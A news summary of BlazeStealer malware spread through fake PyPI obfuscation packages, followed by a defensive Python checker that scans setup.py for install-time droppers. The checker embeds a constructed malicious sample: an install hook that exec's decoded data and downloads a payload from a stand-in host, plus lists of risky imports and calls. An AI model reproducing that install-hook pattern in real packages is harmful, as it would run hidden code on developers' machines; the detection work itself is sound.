Eight new Python packages masquerading as obfuscation tools have been used to distribute the BlazeStealer malware since January, The Hacker News reports.
Installing any of the malicious packages immediately executes BlazeStealer, which retrieves an external payload and starts a Discord bot that gives the attacker full control of the device: exfiltrating browser-stored credentials and screenshots, encrypting files, running arbitrary commands, and disabling Microsoft Defender, according to a report from Checkmarx. BlazeStealer can also degrade the affected device by driving up CPU utilization, shutting the machine down via a Windows Batch script, and triggering a blue screen of death error, the researchers said.
All of the packages, which were mostly downloaded in the U.S., China, Russia, and Ireland, have already been removed.
"The open-source domain remains a fertile ground for innovation, but it demands caution. Developers must remain vigilant, and vet the packages prior to consumption," said researcher Yehuda Gelb.
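The report's key detail is that the payload runs at install time, which on PyPI means code in setup.py. As an added example (not code from Checkmarx or from the article), the static check below parses a package's setup.py and flags the patterns that install-time droppers rely on: an install/develop command override, risky imports, and decode/exec/download calls. The two embedded setup.py strings are constructed samples, not the real packages.

```python
import ast

# Constructed sample modelled on the reported behaviour (install hook that
# decodes and executes something, then fetches a remote payload). Not real.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("ZmFrZQ=="))
        urllib.request.urlopen("http://example.invalid/payload")

setup(name="obfuscation-helper", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample for comparison.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

RISKY_MODULES = {"base64", "urllib", "requests", "subprocess", "socket", "ctypes"}
RISKY_CALLS = {"exec", "eval", "compile", "b64decode", "urlopen", "urlretrieve", "Popen", "system"}
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}  # setuptools command classes

def _call_name(node):
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""

def audit_setup_py(source):
    """Return a sorted list of findings for a setup.py source string (no execution)."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        elif isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        else:
            names = []
        findings.update(f"import:{n.split('.')[0]}" for n in names if n.split(".")[0] in RISKY_MODULES)
        if isinstance(node, ast.ClassDef):  # subclassing a setuptools command = install-time hook
            for b in node.bases:
                base = b.id if isinstance(b, ast.Name) else getattr(b, "attr", "")
                if base in HOOK_BASES:
                    findings.add(f"cmdclass-hook:{base}")
        elif isinstance(node, ast.Call) and _call_name(node) in RISKY_CALLS:
            findings.add(f"call:{_call_name(node)}")
    return sorted(findings)
```

Run it over a downloaded sdist before `pip install`; any `cmdclass-hook` finding combined with decode or network calls deserves a manual read of the file.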